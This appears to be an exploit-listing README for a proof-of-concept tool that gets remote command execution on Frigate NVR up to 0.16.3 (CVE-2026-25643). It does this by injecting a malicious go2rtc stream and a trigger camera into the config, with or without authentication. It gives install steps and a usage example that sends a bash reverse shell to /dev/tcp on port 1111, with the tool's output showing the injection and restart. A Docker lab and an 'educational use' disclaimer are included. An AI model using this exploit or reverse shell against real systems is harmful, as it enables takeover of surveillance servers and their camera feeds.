## https://sploitus.com/exploit?id=20EA02CB-C9C6-536C-917F-649A3D5CBC36
Frigate NVR โค 0.16.3 Blind RCE Exploit (CVE-2026-25643) PoC
## ๐ Description
This Python exploit targets a critical configuration manipulation vulnerability in Frigate NVR versions up to 0.16.3 (both authenticated and unauthenticated paths). By injecting a malicious go2rtc stream and a fake camera entry, it triggers arbitrary command execution as the Frigate process during service restart โ no reverse shell or output capture required.
## ๐ ๏ธ Installation
> [!NOTE]
> To ensure a clean and isolated environment for the project dependencies, it's recommended to use Python's `venv` module.
### OSX/Linux
```bash
git clone https://github.com/joshuavanderpoll/CVE-2026-25643.git
cd CVE-2026-25643
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
```
### Windows
```bash
git clone https://github.com/joshuavanderpoll/CVE-2026-25643.git
cd CVE-2026-25643
python -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
```
## โ๏ธ Usage
```bash
python3 CVE-2026-25643.py -c "bash -i >& /dev/tcp/host.docker.internal/1111 0>&1" --url http://localhost:5001/
Target : http://localhost:5001
Command: bash -i >& /dev/tcp/host.docker.internal/1111 0>&1
[!] No credentials provided โ pattempting unauthenticated access
[*] Fetching current configuration (/api/config/raw) ...
[*] Config fetch โ HTTP 200
[*] Received 914 bytes
[*] Config was JSON-wrapped โ unwrapped
[+] Config parsed successfully (7 top-level keys)
[*] Preparing payload โ executing: bash -i >& /dev/tcp/host.docker.internal/1111 0>&1
[*] Using payload: bash -c 'bash -i >& /dev/tcp/host.docker.internal/1111 0>&1'
[+] Injected malicious stream โ debug_cmd
[+] Injected trigger camera โ trigger_exec
[*] Sending modified config (861 bytes) with option: restart
[*] Config save โ HTTP 200
[+] Configuration accepted (server should restart)
============================================================
Payload sent! Command should execute during go2rtc init / camera probe.
Keep in mind:
โข Output is NOT captured (blind execution)
โข Command runs as the user/frigate process
โข Multiple executions may occur during restart
============================================================
```
## ๐ Docker PoC
```bash
cd docker/
docker compose down
docker compose up -d
# You can test at --url http://127.0.0.1:5001
```
## ๐ป Example


## ๐ต๐ผ References
- Inspiration from https://github.com/jduardo2704/CVE-2026-25643-Frigate-RCE
## ๐ข Disclaimer
This tool is provided for educational and research purposes only. The creator assumes no responsibility for any misuse or damage caused by the tool.